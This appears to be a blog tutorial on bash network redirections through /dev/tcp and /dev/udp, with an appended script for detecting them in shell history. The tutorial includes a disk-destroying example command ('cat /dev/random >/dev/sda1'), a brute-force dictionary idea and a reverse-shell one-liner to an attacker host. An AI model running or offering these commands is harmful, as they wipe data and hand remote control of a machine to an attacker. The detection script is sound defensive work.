I find UNIX a wonderful OS, whatever the flavor! I have used it for 17 years and almost every week I learn new things. One of the particularities of UNIX is the way it communicates with devices. Apart from a few specific devices, most of them are managed and visible as files or pseudo-files within the file system hierarchy. This is known as “everything’s a file”. Examples: /dev/null, /dev/random, /dev/stdin, /dev/stdout, /proc, etc. Some of those devices are always linked to the same file descriptor (or “FD”): stdin is “0”, stdout is “1” and stderr is “2”. Most devices accept standard system calls like open(), close(), read() and write().
Another particularity of UNIX is the primary user interface: the shell. There are plenty of shells; some of them are more oriented to developers, to highly skilled users, etc. One of them is called “bash” and is available on most UNIX flavors, often as the default one.
Most commands executed from your shell can take their input and output via pseudo-files. Examples:
bash# cat /dev/random >/dev/sda1
bash# tar cvf archive.tar . >/dev/null
bash# dd if=/dev/zero of=bigfile count=1000000
Very convenient! But bash implements something very interesting: network redirections. It understands the following pseudo-files: “/dev/tcp/host/port” and “/dev/udp/host/port”. An example?
First, we need to set up a “listener” on the destination host (192.168.1.10). netcat is your best friend:
root@destination# nc -l -p 8888
On the source host, bash will send packets to the listener:
root@source# bash -c "echo Hello World" >/dev/tcp/192.168.1.10/8888
The listener will display:
root@destination# nc -l -p 8888
Hello World
root@destination#
Now the question arises: when can these network redirections be helpful? First, bash can be used without third-party tools to grab data from the network. The example below fetches this blog's main page:
exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\n\n" >&5
cat <&5
exec 5>&-
Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a brute-force attack:
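exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\n\n" >&5
# Save the response to foo.tmp, then close the descriptor
cat <&5 >foo.tmp
exec 5>&-
# Strip the HTML tags and print one word per line
sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "\n"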
Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:
victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0
As the bash shell is very common, it can be very interesting! Just use your imagination to find other examples.
A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “--enable-net-redirections”.
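Because these redirections appear literally on the command line, they are easy to look for in shell history or process-audit records. The script below is an added example, not part of the original post: it extracts every /dev/tcp and /dev/udp target and flags lines whose standard input is read from the socket, as in the “phone home” command above. The function names are hypothetical and the sample command lines are constructed, reusing the commands from this post.

```bash
#!/bin/sh
# Added example: find bash network redirections in recorded command lines.
# SAMPLE_CMDLINES is constructed input in the style of shell history or
# process-audit records; 192.0.2.53 is a documentation placeholder address.
SAMPLE_CMDLINES='tar cvf archive.tar . >/dev/null
bash -c "echo Hello World" >/dev/tcp/192.168.1.10/8888
exec 5<> /dev/tcp/blog.rootshell.be/80
bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0
ls /dev/tcpdump-spool
echo test >/dev/udp/192.0.2.53/514'

# Read text on stdin; print "proto host port" for each pseudo-file found.
# The port field may be a service name, so it is not restricted to digits.
net_redir_targets() {
    grep -oE '/dev/(tcp|udp)/[^/[:space:]]+/[A-Za-z0-9-]+' |
        sed -E 's#^/dev/(tcp|udp)/([^/]+)/(.+)$#\1 \2 \3#'
}

# Classify one command line:
#   stdin-from-socket  fd 0 is read from the socket (the "phone home" form)
#   net-redirect       any other use of /dev/tcp or /dev/udp
#   none               no network pseudo-file
classify_cmdline() {
    if printf '%s\n' "$1" |
        grep -qE '(^|[[:space:]])0?<[[:space:]]*/dev/(tcp|udp)/'; then
        echo stdin-from-socket
    elif [ -n "$(printf '%s\n' "$1" | net_redir_targets)" ]; then
        echo net-redirect
    else
        echo none
    fi
}

# Read command lines on stdin; print verdict, targets and the line itself.
scan_cmdlines() {
    while IFS= read -r line; do
        verdict=$(classify_cmdline "$line")
        if [ "$verdict" != none ]; then
            targets=$(printf '%s\n' "$line" | net_redir_targets | tr '\n' ',')
            printf '%s\t%s\t%s\n' "$verdict" "${targets%,}" "$line"
        fi
    done
}

printf '%s\n' "$SAMPLE_CMDLINES" | scan_cmdlines
```

Feed it real data with, for example, `scan_cmdlines < ~/.bash_history`; a match only shows that the command was typed or logged, not that the local bash was built with net redirections.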